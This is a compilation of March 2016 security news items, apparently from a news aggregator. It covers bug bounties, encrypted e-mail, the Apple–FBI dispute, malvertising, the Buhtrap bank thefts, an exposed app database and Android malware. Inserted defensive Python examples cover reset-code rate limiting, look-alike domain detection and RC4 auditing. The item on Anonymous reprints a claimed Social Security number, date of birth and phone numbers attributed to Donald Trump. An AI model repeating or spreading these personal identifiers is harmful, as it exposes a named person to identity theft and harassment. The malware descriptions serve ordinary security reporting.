How to Make $100,000? Just Hack Google Chromebook
19.3.2016 Hacking
Yes, you could earn $100,000 if you have the hacking skills and love to play with electronics and gadgets.
Google has doubled its top bug bounty for hackers who can crack its Chromebook or Chromebox machine over the Web.
So if you want to get a big fat check from Google, you must have the ability to hack a Chromebook remotely, meaning your exploit must be delivered via a web page.
How to Earn $100,000 from Google
The Chrome security team announced Monday that the top prize for hacking a Chromebook remotely has now been increased from $50,000 to $100,000 after nobody managed to successfully hack its Chromebook laptops last year.
The top bug bounty will be payable to the first person who executes a 'persistent compromise' of the Chromebook while the machine is in Guest Mode.
In other words, the hacker must be able to compromise the Chromebook when the machine is in a locked-down state meant to ensure its user's privacy.
Moreover, the hack must still work even when the system is reset.
"Last year we introduced $50,000 rewards for the persistent compromise of a Chromebook in guest mode," the Google Security Blog reads.
"Since we introduced the $50,000 reward, we have not had a successful submission. Great research deserves great awards, so we're putting up a standing [6-figure] sum, available all year round with no quotas and no maximum reward pool."
Bug bounties have become an essential part of information security and have been offered by major Silicon Valley companies to hackers and security researchers who discover vulnerabilities in their products or services.
Last year, Google paid out more than $2,000,000 in bug bounties overall to hackers and researchers who found bugs across its services – including $12,000 to Sanmay Ved, an Amazon employee, who managed to buy the Google.com domain.
So Keep Hunting, Keep Earning!
The Best Way to Send and Receive End-to-End Encrypted Emails
19.3.2016 Security
How many of you know that your daily e-mails pass through a deep espionage filter?
This was unknown until the whistleblower Edward Snowden exposed the surveillance secrets, which made privacy and security more important for all Internet users than ever before.
I often get asked "How to send encrypted email?", "How can I protect my emails from prying eyes?" and "Which is the best encrypted email service?".
There are a number of encryption tools that offer encrypted email services to ensure that no one can see what you are sending to someone else.
One such tool to send encrypted emails is PGP (Pretty Good Privacy), an encryption tool designed to protect users’ emails from snooping.
However, setting up a PGP environment is quite a difficult task for non-technical users, so more than 97% of Internet users, including government officials, are still communicating via unencrypted email services such as Gmail, Yahoo and others.
But here is good news for all those non-techies, but privacy-conscious Internet users, who wish to use encrypted e-mail communication without any hassle.
Solution — ProtonMail.
ProtonMail, developed by CERN and MIT scientists, is a free, open source and end-to-end encrypted email service that offers the simplest and best way to maintain secure communications to keep user's personal data secure.
ProtonMail Now Available for iOS and Android Users
ProtonMail has been invite-only since 2014, but now the email service has made itself available to everyone and launched new mobile apps.
If you opt for a free account, you'll get all of the basic features including:
A smart-looking app to access your end-to-end encrypted emails easily
500MB of storage capacity
Sending 150 Messages per day
Two-factor authentication to access your encrypted email inbox
To increase storage capacity, you can purchase ProtonMail's paid accounts.
NOTE – Always remember your password to decrypt the email inbox. Once forgot, you would no longer retrieve your encrypted emails.
Key Features:
Even if someone intercepts your communication, he/she can not read your conversations because all emails you send or receive with other ProtonMail users are automatically encrypted end-to-end by the service.
In addition, for communicating with non-ProtonMail email addresses, e.g. Gmail users, all you need to do is:
Create a message
Just click the encryption button
Set a random password
Once done, the recipient of your encrypted email will get a link to the message with a prompt to enter that same password in order to read it.
Another friendly feature that ProtonMail offers is Self-destructing emails. All you need to do is set an expiration date for an encrypted email you send, and it will get self-deleted from the recipient’s inbox once the date arrives.
Why ProtonMail won't have to comply with American Laws?
In a previous article, I explained that ProtonMail is based in Switzerland, so it won't have to comply with American courts’ demands to provide users data.
In the worst case, if a Swiss court ordered ProtonMail to provide data, it would get only heaps of encrypted data, as the company doesn’t store the encryption keys.
ProtonMail gained an enormous amount of popularity during its development stages.
ProtonMail encrypts the data in the browser before it communicates with the server; therefore only encrypted data is stored on the email service's servers, making it significantly more secure for those looking for an extra layer of privacy.
Feel free to email our team at thehackernews@protonmail.com.
The FBI could spy on people through the phone's camera, Apple warns
19.3.2016 Threats
The dispute between Apple and FBI investigators over unlocking the iPhone of the San Bernardino killer will be decided by a US court as early as next week. Eddy Cue, the computer giant's vice president for software and services, has now warned that a final verdict in favour of the FBI could set a very dangerous precedent, one that could lead, for example, to people being spied on remotely through the camera in their phone.
“When they force us to build a new system with a ‘back door’, where does it go from there?” Cue said, according to the Apple Insider website.
Above all he fears that the demands will escalate. “For example, one day the FBI will want us to make the camera or the microphone in the phone accessible. Those are things we simply cannot do right now,” Apple's vice president explained of what the court's decision could bring.
The whole dispute flared up because FBI investigators failed to get into the locked iPhone of the Islamic radical. He had set his iPhone to wipe itself automatically after ten incorrect passcodes were entered.
It is not only about the killer's iPhone
It was precisely because of the investigators' failure that a court ordered Apple to disable this function. The management of the American computer giant refused, however, saying that it is not technically possible. The only way to make the iPhone accessible is reportedly to create a “back door” into the iOS operating system, which is used by iPhone smartphones and iPad tablets.
Apple chief Tim Cook rejects that, because he fears possible misuse. By implementing such a tool in the mobile platform, the FBI would be able to bypass the security of practically any iPhone or iPad in the future.
At the beginning of March it emerged that the FBI is not only after the killer's iPhone. Since last October alone it has wanted to unlock a total of nine devices. [full story]
The FBI wants the system's source code
The FBI is now trying, through the court, to force Apple's management to “start cooperating”. Otherwise, the investigators want the American computer giant to be made to hand over the complete source code of the system. With its help they would probably also get into the killer's iPhone.
Because of the whole dispute, Cook has even already turned to US President Barack Obama. With his help he would like to push for the creation of a special committee that would deal with the issue of phone encryption.
The authorities have not yet responded to his request. It is therefore not clear whether Obama will receive Cook.
Ever Wondered How Facebook Decides — How much Bounty Should be Paid?
18.3.2016 Social Site
Facebook pays Millions of dollars every year to researchers and white hat hackers from all around the world to stamp out security holes in its products and infrastructure under its Bug Bounty Program.
Facebook recognizes and rewards bug hunters to encourage more people to help the company keep Facebook users safe and secure from outside entities, malicious hackers or others.
Recently, the social media giant revealed that India tops all countries in the number of vulnerabilities reported in the Facebook platform, and also holds the top position among countries receiving the most bug bounty payments.
"India is home to the largest population of security researchers participating in the Facebook bug bounty program since its inception in 2011. The country also holds the top spot for most bounties paid," Adam Ruddermann, Facebook’s technical program manager notes.
If you are one of Facebook’s bug hunters, you might be aware that reporting the same type of flaw (say, Cross-site Scripting or XSS) in Facebook does not always make one eligible for the same bounty.
Have you ever wondered why? And how Facebook decides the bounty amount?
Well, the procedure works exactly the same way The Hacker News team decides which news to cover first and which not at all, i.e. based on the risk to end users.
Recently, Facebook’s bug bounty team explained how they calculate bounties.
How Facebook Calculates Bug Bounties?
Facebook calculates bounties, of course, based on Risk to end-users. The company offers a maximum reward of USD$20,000 and a minimum of USD$500.
Bugs that allow someone to access private Facebook data, delete Facebook data, modify an account or run JavaScript under facebook.com are considered high-impact vulnerabilities that directly affect end users, so they are the highest-paid bugs.
"The security community in India is strong and growing every day," Facebook says. "India has long topped the list of 127 countries whose researchers contribute to our bug bounty program."
Here’s the Procedure Facebook Security team follows:
Step 1: The Facebook Bug Bounty team first looks at the potential impact of a vulnerability reported.
Step 2: Engineers at Facebook then assess how difficult or easy it is to exploit the particular vulnerability, whether it is high-severity, and the kind of resources or technical skills a successful attack would require.
Step 3: The team then looks at whether any existing features can already mitigate the issue, for example, an implementation of rate-limiting mechanism to prevent brute-force attacks.
Step 4: Sometimes bug hunters report bugs that are actually Facebook features designed to give users a better experience on the social media platform. These reports are generally not considered eligible unless they pose a threat.
Based upon the aforementioned steps, Facebook decides a base payout for each eligible vulnerability report.
The bounty amount can change as the risk landscape evolves; for example, a bug that leads to more bugs gets a bigger payout.
The team also reserves an option to award security researchers and white hat hackers more than the base amount if the report itself demonstrates a high level of clarity, sophistication, and detail.
Example — Bug Bounties Paid by Facebook
Earlier this month, Anand Prakash, 22, of India was awarded $15,000 (roughly Rs. 10 Lakhs) for reporting a password reset vulnerability that could have allowed attackers to hack any Facebook account by resetting its password via unlimited brute force of a 6-digit code.
Have you ever wished to delete a photo from Facebook that you didn't like but that was posted by someone else? Believe me, it was possible until last year, when two independent Indian security researchers reported two separate vulnerabilities to Facebook and were awarded $12,500 each.
Do you know what the highest bug bounty ever paid by Facebook is? It is $33,500, paid to a Brazilian hacker who managed to hack into a Facebook server using a remote code execution vulnerability.
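Step 3 above mentions rate limiting as the kind of existing mitigation that lowers a bug's payout, and the password reset report shows what happens when it is missing: a 6-digit code has only a million possibilities, so an unlimited number of guesses makes it a matter of time. The following Python class is an added example, not Facebook's code, showing the minimal server-side controls that close that gap for a reset code: a per-code attempt limit, an expiry, single use, and a constant-time comparison. The limit of 5 attempts, the 10-minute lifetime and the injectable clock are assumptions made for the example.

```python
import hmac
import secrets
import time
from dataclasses import dataclass
from typing import Callable, Dict

MAX_ATTEMPTS = 5          # guesses allowed per issued code (assumed policy value)
CODE_TTL_SECONDS = 600    # a code is valid for ten minutes (assumed policy value)


@dataclass
class ResetChallenge:
    code: str
    issued_at: float
    attempts: int = 0


class ResetCodeService:
    """Issues 6-digit password reset codes and verifies them with a per-code
    attempt budget, an expiry and single use. A clock can be injected for tests."""

    def __init__(self, clock: Callable[[], float] = time.time) -> None:
        self._clock = clock
        self._challenges: Dict[str, ResetChallenge] = {}

    def issue(self, account: str) -> str:
        # A fresh code replaces any outstanding one, resetting the attempt budget
        # only because the old code is discarded with it.
        code = f"{secrets.randbelow(1_000_000):06d}"
        self._challenges[account] = ResetChallenge(code, self._clock())
        # In a real deployment the code is delivered out of band (SMS, e-mail)
        # and never returned to the requesting client.
        return code

    def verify(self, account: str, submitted: str) -> str:
        """Return one of: ok, wrong, locked, expired, no_challenge."""
        challenge = self._challenges.get(account)
        if challenge is None:
            return "no_challenge"
        if self._clock() - challenge.issued_at > CODE_TTL_SECONDS:
            del self._challenges[account]
            return "expired"
        if challenge.attempts >= MAX_ATTEMPTS:
            # Budget exhausted: even the right code is rejected until a new one is issued.
            return "locked"
        challenge.attempts += 1
        # Constant-time comparison avoids leaking how many leading digits matched.
        if hmac.compare_digest(challenge.code.encode(), submitted.encode()):
            del self._challenges[account]   # single use
            return "ok"
        return "locked" if challenge.attempts >= MAX_ATTEMPTS else "wrong"


if __name__ == "__main__":
    svc = ResetCodeService()
    code = svc.issue("demo-account")
    wrong = f"{(int(code) + 1) % 1_000_000:06d}"
    for _ in range(MAX_ATTEMPTS + 1):
        print("wrong guess ->", svc.verify("demo-account", wrong))
    print("correct code after lockout ->", svc.verify("demo-account", code))
```

With this in place an attacker gets at most MAX_ATTEMPTS guesses per issued code, so the success probability of a blind guess is MAX_ATTEMPTS in a million rather than a certainty. In production the limit should also be enforced per source address and per account across repeated code requests, and the stored code should be a hash rather than the plaintext digits.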
There was another interesting bug in Facebook that received the highest attention, but no bounty was paid.
Yes, I am talking about Palestinian Hacker, 'Khalil Shreateh', who posted vulnerability details on Facebook CEO Mark Zuckerberg’s wall to prove his point, after Facebook Security Team failed to recognize his critical vulnerability thrice.
Unfortunately, Khalil did not receive any bounty because he did not follow the disclosure guidelines correctly and failed to clarify the vulnerability details to the Facebook Security Team.
Do you want to know how to earn high bounties? Find and Report high-severity bugs.
"The most important factor for getting the maximum bounty possible is to focus on high-risk vulnerabilities, specifically those with widespread impact," Facebook says. "So, if you're looking to maximize your bounties, focus on quality over quantity."
Bug bounty programs have been widely used by a large number of prominent technology companies including Google, Facebook and PayPal, for which bug hunters play a vital role in securing their users’ online accounts.
Bug bounties and disclosure programs encourage researchers and hackers to responsibly report vulnerabilities to the affected companies rather than exploiting them to compromise users’ security, which may also affect the company's reputation.
Anonymous claims they Hacked Donald Trump ...Really?
18.3.2016 Hacking
The 'Hacktivist' collective group Anonymous claimed to have leaked personal details of the controversial US presidential candidate Donald Trump, including his Mobile Phone Number and Social Security Number (SSN).
Donald Trump
SSN: 086-38-5955
DOB: 06/14/1946
Phone Number: 212-832-2000
Cell/Mobile Phone Number: (917) 756-8000
The hacktivist group has declared war against Trump under a campaign with the hashtag #OpWhiteRose.
The White Rose Society was a non-violent resistance group in Nazi Germany and was known for its anti-Nazi pamphlets and graffiti during World War II.
Anonymous posted a YouTube video Thursday afternoon in which a man in a Guy Fawkes mask says:
"Donald Trump has set his ambitions on the White House in order to promote an agenda of fascism and xenophobia as well as the religious persecution of Muslims through totalitarian policies.
He has proposed targeting family members of suspected terrorists for assassination, even while acknowledging they are innocent. It would only lead to more violence from those whose families were killed by the Trump regime.
Donald Trump is an enemy of the constitution and the natural rights it enshrines. We call on all of you and millions of others to take action against Donald Trump."
The hacker collective group also released what it claimed was Trump's personal details, including cell phone number and Social Security number.
Besides his personal details, the group also released Trump’s public information including his birth date, children’s names, and company address in addition to the identities of his agent and lawyer.
However, most of the information provided by Anonymous has been circulating on the Internet since at least late last year, including his New York cell phone number and an address on 5th Avenue in Manhattan.
In response to the video, Trump's campaign has issued the following statement:
"The government and law enforcement authorities are seeking the arrest of the people responsible for attempting to illegally hack Mr. Trump's accounts and telephone information."
Soon after posting the video, Anonymous issued a follow-up tweet, saying "Seems to be outdated information, take it with a grain of salt."
This is not the first time the group has declared war against Trump. Last December, Anonymous declared war against Trump following his radical speech stating he wanted to ban Muslims from entering the United States.
Malvertising Campaign Hits Top Websites to Spread Ransomware
18.3.2016 Virus
Hackers are always searching for new ways to create loopholes in cyberspace and push their dark agenda through vulnerability exploitation.
Top trustworthy sites such as The New York Times, BBC, MSN, AOL and many more are on the verge of losing their face value as a malvertising campaign is looming around these websites, according to SpiderLabs.
Here's what Happens to Users when Clicking Ads on these Big Brand Sites:
The advertisements on the legitimate sites trick users into clicking on them, making users believe that the ads come from a trusted network.
Once clicked, the malicious Ad redirects the user to a malicious website that hosts Angler Exploit Kit (AEK) to infect visitors by installing malware and ransomware on their computer.
Angler Exploit Kit includes many malicious hacking tools and zero-day exploits that let hackers execute drive-by attacks on visitors' computers.
In this case, the Angler kit scans for the vulnerable PCs and loads Bedep Trojan and TeslaCrypt Ransomware, opening doors for hackers to further install a variety of malicious programs.
Buying Media-Related Domains to Spread Malicious Campaigns
While conducting the background check, the security firm discovered that the cyber criminals behind this advertising campaign made use of the expired website domain of Brentsmedia, an online marketing company that discontinued its service in early 2016.
According to the web registrar records, Brentsmedia's domain was purchased by Pavel G Ashtahov on March 6th, the day just before the malvertising campaign kickstarted.
Detailed analysis of this malicious ad campaign revealed that when a user clicks on the malvertised ad, it fetches a JSON (JavaScript Object Notation) file containing a list of security products, and checks for their presence on the victim's system.
If any of the pre-defined products is found installed, the malvertising ad does not load the malicious payload, so that antivirus firms that could block the campaign do not detect it.
If none is present, it carries out the exploitation stealthily, ultimately redirecting the user to the malicious page.
The Intensity of the Malvertising!
According to the researchers' telemetry, these malicious ads were delivered through two affiliate networks, namely Adnxs, which has already resolved the issue, and Taggify, which has not paid any attention to the seriousness of the problem.
The researchers also found two more expired media-related domains exhibiting the same characteristics as brentsmedia[.]com, "envangmedia[.]com" and "markets.shangjiamedia[.]com", which shows that other similarly named domains have already been registered.
So there is a real possibility that expired "media"-branded domains will be hijacked to run malvertising campaigns, a new kind of threat for the world's leading publishers.
Buhtrap group stole tens of millions of dollars from Russian banks
18.3.2016 Incident
From August 2015 to February 2016 Buhtrap group managed to conduct 13 successful attacks against Russian banks for a total amount of $25.7 mln.
Since August 2015, the Buhtrap group has conducted 13 successful attacks against financial institutions, stealing more than ₽1.86 billion RUB ($27.4M USD). In April 2015, ESET discovered a malware campaign dubbed Operation Buhtrap, a combination of the Russian word for accountant, “Buhgalter”, and the English word “trap”. So far Buhtrap has not been seen anywhere else in the wild: 88 percent of targets have been in Russia and ten percent in Ukraine. Analysts have also likened the campaign to the Anunak/Carbanak campaign, which also targeted Russian and Ukrainian banks.
The modus operandi of these particular cybercriminals is usually associated with targeted attacks rather than cyber fraud, which makes this move to financial crime unusual and effective.
In the latest wave of attacks, the attackers hit Russian banks by pretending to be FinCERT, a center established by the Russian Central Bank for dealing with cyber-attacks in Russia’s financial sector.
According to a report released by the security firm Group-IB, Buhtrap has been active since 2014, although its first attacks against financial institutions were only detected in August 2015. Earlier, the group had only focused on targeting banking clients. At the moment, the group is known to target Russian and Ukrainian banks; below is the timeline of the attacks published by Group-IB:
The Buhtrap timeline is a sequence of successful attacks: in August 2015 the hackers stole ₽25.6 million RUB ($375,617 USD), and two months later a new campaign resulted in losses of ₽99 million RUB ($1.4 million USD).
In November 2015, the group raked in ₽75 million RUB ($1.1 million USD) with two distinct campaigns against two banks. In December the group reached a peak in its activity, targeting 5 banks and taking ₽571 million RUB ($8.3 million USD). It also conducted two successful attacks in January and two more a month later. In all, the group has stolen ₽1.86 billion RUB ($27.4M USD) from banks in Russia.
The activities continued in January and February, stealing dozens of millions of dollars from banks in Russia.
In February 2016, a developer for Buhtrap leaked the complete source code for the malware used by the group because he wasn’t paid by the gang. Experts who have analyzed it discovered that the code is related to an earlier revision and not to the one used in the recent attacks.
“Earlier, the group had only focused on targeting banking clients. At the moment, the group is known to target Russian and Ukrainian banks.” states the report.
“In many respects, this group’s activity has led to the current situation where attacks against Russian banks causing direct losses in the hundreds of millions of rubles are no longer taken as something unusual,”
The tactic used by the Buhtrap group is well established: the hackers register typo domains, or domains that look familiar to the victim, and then rent servers on which they set up mail servers to send phishing emails on behalf of the legitimate company, avoiding spam filtering.
The group used custom malware able to detect security software and other defensive solutions. The malware tracks the banking operations made by the victims; when it notices such operations, it downloads a legitimate remote access tool (LiteManager), which is then used to carry out fraudulent transfer orders.
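The look-alike sender domains described above are something a mail gateway can screen for. The following is an added example, not code from the Group-IB report or from this article: a defender-side heuristic that flags sender domains resembling a set of protected domains (homoglyph swaps, one-character typos, hyphenated imitations and protected names buried in longer hostnames). The protected-domain list and the sample headers are constructed for illustration.

```python
"""Flag look-alike sender domains in e-mail From: headers.

Added example (not from the Group-IB report or this article). The
protected-domain list and the sample headers below are constructed.
"""
import re

# Assumption: domains this organisation considers legitimate senders.
PROTECTED_DOMAINS = {"fincert.ru", "cbr.ru", "example-bank.ru"}

# Digit/letter substitutions commonly used to build look-alike names.
HOMOGLYPHS = (("0", "o"), ("1", "l"), ("3", "e"), ("5", "s"), ("vv", "w"), ("rn", "m"))

# Extracts the domain part of the first address in a header line.
FROM_RE = re.compile(r"@([A-Za-z0-9.-]+)")


def normalize(label: str) -> str:
    """Undo common homoglyph substitutions (f1ncert -> flncert, examp1e -> example)."""
    for fake, real in HOMOGLYPHS:
        label = label.replace(fake, real)
    return label


def levenshtein(a: str, b: str) -> int:
    """Classic edit distance (insert, delete, substitute)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def registrable(domain: str) -> str:
    """Last two labels, e.g. mail.cbr.ru -> cbr.ru.
    Assumption: no public-suffix list, so co.uk-style suffixes are not handled."""
    labels = domain.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def classify(domain: str, protected=PROTECTED_DOMAINS):
    """Return (verdict, protected domain it matches or resembles, or None).

    verdict is 'trusted' (a protected domain or a subdomain of one),
    'lookalike' (resembles a protected domain) or 'unknown'."""
    domain = domain.lower().rstrip(".")
    reg = registrable(domain)
    if reg in protected:
        return "trusted", reg
    rname = normalize(reg.split(".")[0])
    for p in protected:
        pname = p.split(".")[0]
        # Protected name buried in a longer hostname: fincert.ru.<attacker domain>
        if ("." + p + ".") in ("." + domain + "."):
            return "lookalike", p
        # Hyphenated imitation: cbr-ru.com, example-bank-support.ru
        if rname == p.replace(".", "-") or rname.startswith(pname + "-"):
            return "lookalike", p
        # Homoglyph swap, or a one-character typo of a sufficiently long name
        if rname == pname or (len(pname) >= 5 and levenshtein(rname, pname) <= 1):
            return "lookalike", p
    return "unknown", None


def scan(headers):
    """Classify the sender domain of each header; returns [(domain, verdict, match)]."""
    results = []
    for h in headers:
        m = FROM_RE.search(h)
        if m:
            verdict, match = classify(m.group(1))
            results.append((m.group(1).lower(), verdict, match))
    return results


# Constructed sample headers (not real mail).
SAMPLE_HEADERS = [
    "From: FinCERT <alerts@fincert.ru>",
    "From: FinCERT <alerts@f1ncert.ru>",
    "From: Bank of Russia <notify@fincert.ru.secure-mail-update.com>",
    "From: Support <security@cbr-ru.com>",
    "From: Newsletter <news@example.com>",
]

if __name__ == "__main__":
    for domain, verdict, match in scan(SAMPLE_HEADERS):
        print(f"{verdict:9} {domain}" + (f"  (resembles {match})" if match else ""))
```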
What to expect in the next months?
The experts have no doubt that the group will continue its activity, likely improving its TTPs. Researchers at Group-IB fear that the public availability of the gang’s malware may increase the number of campaigns against banks conducted by other criminal organizations.
“The published source codes are active. Their wide distribution may trigger the increase in the number of attacks using this malware conducted by other groups. The builder interface is presented below.” states the report.
I suggest taking a look at the interesting report published by Group-IB; it is full of valuable information on the Buhtrap group, including indicators of compromise.
DB of the Kinoptic iOS app abandoned online with 198,000 records
18.3.2016 iOS
Chris Vickery has discovered online the database of the Kinoptic iOS app, which was abandoned by developers, with details of over 198,000 users.
The security researcher Chris Vickery has discovered a database belonging to an abandoned iOS app, the Kinoptic iOS app, that is exposing on the Internet personal details of over 198,000 users.
The Kinoptic iOS app allowed Apple users to create cinematic slideshows of their photos, animate smaller portions of one picture and, of course, to share it through social media platforms.
“Kinotopic allows you to create, share, and store short video moments and make them more expressive – in the form of animated pictures and cinemagraphs.” states the app description.
The Kinoptic iOS app was present on the official App Store from 2012 to 2015, and its website was closed in early 2016.
Chris Vickery is known for his research on Internet-exposed MongoDB databases: he discovered archives exposing the personal details of hundreds of millions of U.S. voters and, recently, a misconfigured MongoDB installation behind a Microsoft career portal that exposed visitors to attacks.
Vickery confirmed that the database behind the Kinoptic iOS app remained online even though the application was removed from the official Apple store. The disconcerting aspect of the story is that the developers of the Kinoptic iOS app abandoned their service, leaving the data exposed on the Internet, a present for crooks who could use it to target unaware users.
The data is available without authentication and includes usernames, email addresses, and hashed passwords, along with other details stored in profiles managed by the Kinoptic iOS app.
Vickery tried to report the issue to both the Kinoptic developers and Apple. The Kinoptic team has never replied to the expert, while Apple’s reply was:
“Chris, if you believe that this issue affects the security of an iOS device or the iTunes Store, you may report it to product-security@apple.com. […]
On the other hand, if this security issue only affects the application itself, I’m afraid you will need to continue getting in touch with the app developer for assistance.”
This means that the data will continue to stay online until the server or the database is shut down.
Of course, if you have used the Kinoptic app in the past, you need to change your password as soon as possible.
New Android Gmobi adware found in firmware and popular apps
18.3.2016 Android
Malware researchers at the Dr Web firm have found an Android malware named Gmobi specifically designed to spread as a software development kit (SDK).
Malware researchers at security firm Dr.Web have detected a new strain of malware that was specifically designed to spread as a software development kit (SDK) used by software developers and mobile device manufacturers. The malware, named Android.Gmobi.1, has been found in several legitimate applications developed by well-known companies, as well as in firmware for nearly 40 mobile devices.
“This Trojan, which was named Android.Gmobi.1, is designed as a specialized program package (the SDK platform) usually used either by mobile device manufacturers or by software developers to expand functionality of Android applications. In particular, this module is able to remotely update the operating system, collect information, display notifications (including advertising ones), and make mobile payments.” states the analysis published by the company.
The malware acts as an information stealer: it collects user and device data and sends them back to the C&C server. Gmobi collects user emails, device info, roaming availability status, GPS or mobile network coordinates, and whether the Google Play app is installed on the device.
The malware belongs to the adware category: once the C&C server has received the data from the device, it can instruct Gmobi to show ads in specific positions on the device. The bad news is that the operators behind Gmobi can also instruct the malware to download and install malicious APK files using a standard system dialog.
The experts highlighted that the Gmobi adware can install the APK files in a covert way only if the malware has the necessary privileges.
The server replies with an encrypted JSON (JavaScript Object Notation) object that can contain the following commands:
Update the database with information about the advertisement to display.
Create an advertising shortcut on the home screen.
Display an advertising notification.
Display a notification that, when tapped, launches an installed application.
Automatically download and install APK files using a standard system dialog. A covert installation of these files is performed only if the Trojan has necessary privileges.
The researchers have detected Gmobi in Trend Micro’s Dr. Safety and Dr. Booster apps, and the ASUS WebStorage apps. The Gmobi variant that was discovered in the software of the Trend Micro firm only collected information from the Android devices and sent it to a remote server.
Dr.Web reported the issue to all the impacted companies, Trend Micro has promptly released a new version of the infected apps.
“If your device’s firmware is infected by this Trojan, the malware cannot be removed by the anti-virus without root privileges. However, even if root privileges are gained, there is a high risk of making the device non-operational because the Trojan can be incorporated into some critical system application. Therefore, the safest solution for victims of Android.Gmobi.1 is to contact the manufacturer of the device and ask them to release a firmware update without the Trojan.” concludes Dr.Web.
Microsoft says goodbye to the RC4 cipher, which protected HTTPS and Wi-Fi
18.3.2016 Security
Microsoft announced that in the near future it will remove default support for RC4 from its Edge and Internet Explorer (11) browsers. RC4 is an algorithm used, for example, for the encrypted transport of web pages and for securing wireless networks. The history of the RC4 cipher goes back to 1987.
RC4
A cipher widely used in the common SSL/TLS protocols for HTTPS, and in WEP and WPA on Wi-Fi networks. It was popular for its speed, simplicity and ease of implementation. Today, however, it has been superseded by more modern alternatives.
The change will take place as part of the cumulative security updates to be released next month, specifically on April 12 (that is, together with other security patches for other products).
Microsoft is thereby fulfilling a commitment it announced last year. It also follows competing products such as Google Chrome, Mozilla Firefox and Opera, which already disabled RC4 support in previous updates.
Since most modern web services and browsers have already moved away from RC4, ordinary users should in principle not fear any restrictions when browsing secured websites.
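A server operator who wants to know whether a configuration still relies on RC4 before browsers stop offering it can audit the cipher-suite list directly. The following is an added example, not code from Microsoft's announcement or from this article: it classifies cipher suite names (OpenSSL and IANA spellings) by substring markers for RC4 and other legacy algorithms, and applies the same check to a Python TLS context. The sample server suite list is constructed for illustration.

```python
"""Audit TLS cipher-suite lists for RC4 and other legacy algorithms.

Added example (not from Microsoft's announcement or this article).
The sample server suite list below is constructed.
"""
import ssl

# (substring in the upper-cased suite name, why it is a finding).
# Assumption: plain substring matching is enough for common suite names.
LEGACY_MARKERS = (
    ("RC4", "RC4 stream cipher (keystream biases; prohibited by RFC 7465)"),
    ("MD5", "MD5-based record MAC"),
    ("3DES", "64-bit block cipher (Sweet32)"),
    ("DES-CBC3", "64-bit block cipher (Sweet32)"),
    ("EXPORT", "export-grade key length"),
    ("EXP-", "export-grade key length"),
    ("NULL", "no encryption or no MAC"),
    ("ANON", "unauthenticated key exchange"),
    ("ADH-", "unauthenticated key exchange"),
)


def audit_suite(name: str) -> list:
    """Return the reasons a suite is legacy (empty list if none found)."""
    upper = name.upper()
    reasons = []
    for marker, reason in LEGACY_MARKERS:
        if marker in upper and reason not in reasons:
            reasons.append(reason)
    return reasons


def audit_cipher_list(names) -> dict:
    """Map each legacy suite in `names` to its reasons; clean suites are omitted."""
    return {n: audit_suite(n) for n in names if audit_suite(n)}


def context_allows_rc4(ctx: ssl.SSLContext) -> bool:
    """True if the context would still negotiate any RC4 suite."""
    return any("RC4" in c["name"].upper() for c in ctx.get_ciphers())


def hardened_context() -> ssl.SSLContext:
    """Client context restricted to AEAD suites with forward secrecy, RC4 excluded."""
    ctx = ssl.create_default_context()
    ctx.set_ciphers("ECDHE+AESGCM:ECDHE+CHACHA20:!aNULL:!eNULL:!MD5:!RC4:!3DES")
    return ctx


# Constructed example: a server cipher list that still carries RC4 fallbacks.
SAMPLE_SERVER_SUITES = [
    "ECDHE-RSA-AES128-GCM-SHA256",
    "ECDHE-ECDSA-CHACHA20-POLY1305",
    "TLS_RSA_WITH_RC4_128_SHA",
    "ECDHE-RSA-RC4-SHA",
    "RC4-MD5",
    "DES-CBC3-SHA",
]

if __name__ == "__main__":
    for suite, reasons in audit_cipher_list(SAMPLE_SERVER_SUITES).items():
        print(f"{suite}: {'; '.join(reasons)}")
    print("default context allows RC4:", context_allows_rc4(ssl.create_default_context()))
```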
FBI warns: smart cars can easily become a target for hackers
18.3.2016 Hacking
Disabled brakes, switched-off lights or a stuck accelerator. Drivers' nightmares may no longer be caused only by material fatigue, but also by hackers.
A hacked corporate system is unpleasant, but it is not necessarily a matter of life and death. A hacked car is worse. US authorities have issued a warning about the growing danger of attacks on trucks and passenger cars over the Internet.
“Modern cars allow various devices to be connected, which bring, for example, more economical operation or greater comfort while driving. But at the price that a car connected to the Internet represents a greater risk,” the report says.
According to the FBI, owners of connected cars should treat their vehicles like computers: update the software and not skip any recall by the manufacturer to physically patch discovered security holes. Naturally, unauthorized modifications of the system or the use of unvetted gadgets are not recommended either.
Most of the tips stem from last year's experience, when hackers Charlie Miller and Chris Valasek hacked a Chrysler system in July, which meant a recall of 1.4 million cars for the carmaker. Just a month later, researchers from the University of California demonstrated how easily a Corvette can be hacked, via a dongle that an insurance company provides to its clients for their cars.
“There isn't much new information in the text. Moreover, it comes with quite a big delay. In any case, it will still be useful. People take the FBI seriously,” hacker Chris Valasek told Wired magazine.
According to the hacker, the authorities can now look forward to a flood of reports of car hacking. The same thing happened to the researchers last year. “We are glad the FBI will take it over from us,” he adds.
Connected cars also became one of the bigger topics at this year's MWC trade fair in Barcelona. Besides Samsung, T-Mobile also showed off a novelty there. The operator sees cars primarily as yet more devices into which it can plug its data SIM cards.
Marcher Trojan for Android spreads via pornographic websites
18.3.2016 Mobile
The Marcher Trojan exploits interest in pornography and gets into the phones of those seeking porn in order to rob them of money. But they have to clear the way for it themselves.
How can a Trojan horse get into an Android phone? Usually because you install it there voluntarily, which is ultimately also the case with Marcher, which uses pornographic websites. Users of a porn site are sent a link to download an application by e-mail or SMS. It poses as an Adobe Flash Player update that is supposedly required to access the desired porn.
Posing as Flash or a Flash update is one of the most common ways viruses and malware get onto classic computers too. On a mobile phone they have a harder time: installation of applications from sources other than Google Play must be allowed, but individuals hungry for porn will probably overcome this obstacle easily. After installation the Trojan obtains administrator rights (the user naturally grants them) and the user is “sent” an MMS with a link to the X-Video application on Google Play; that application contains nothing malicious and is probably used only to create an appearance of legitimacy.
The Trojan then directly asks for payment details, posing as a form from Google Play. In some cases it can obtain them from other payment applications that may be present on the phone. It can also create fake bank login pages (using information about which banking applications you have on your phone) and is equipped with a number of other tricks.
Zscaler, in Android Marcher now marching via porn sites, states that Marcher originated sometime in 2013 and originally made do with only imitating Google Play to obtain payment details. Later it added the creation of fake bank login pages. If you are interested in more information about this Trojan, try Android.Trojan.Marcher by PhishLabs. While reading you will also notice that the Czech Republic is listed among the affected countries with an 11% share.
